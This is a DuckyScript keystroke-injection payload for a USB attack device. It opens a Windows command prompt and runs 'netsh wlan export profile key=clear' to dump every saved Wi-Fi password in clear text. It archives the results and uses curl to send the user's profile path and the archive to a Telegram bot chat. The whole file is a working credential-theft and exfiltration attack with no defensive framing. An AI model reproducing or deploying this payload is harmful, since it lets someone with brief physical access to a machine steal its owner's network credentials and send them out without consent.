DELAY 750
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 750
STRING cd %TEMP% && if exist wifi rd /s /q wifi
ENTER
DELAY 750
STRING cd %TEMP% && mkdir wifi && cd wifi && netsh wlan export profile key=clear && cd ../ && tar -cvzf wifi.tar "wifi" &
STRING & curl -s -X POST "https://api.telegram.org/bot1366543817:apixxxxxx/sendmessage?chat_id=
STRING 1268153988&text=%userprofile%" && curl -s -X POST "https://api.telegram.org/bot1366543817:apixxxxxx/
STRING sendDocument?chat_id=1268153988" -F document=@"wifi.tar"
ENTER
DELAY 2000
STRING exit
ENTER
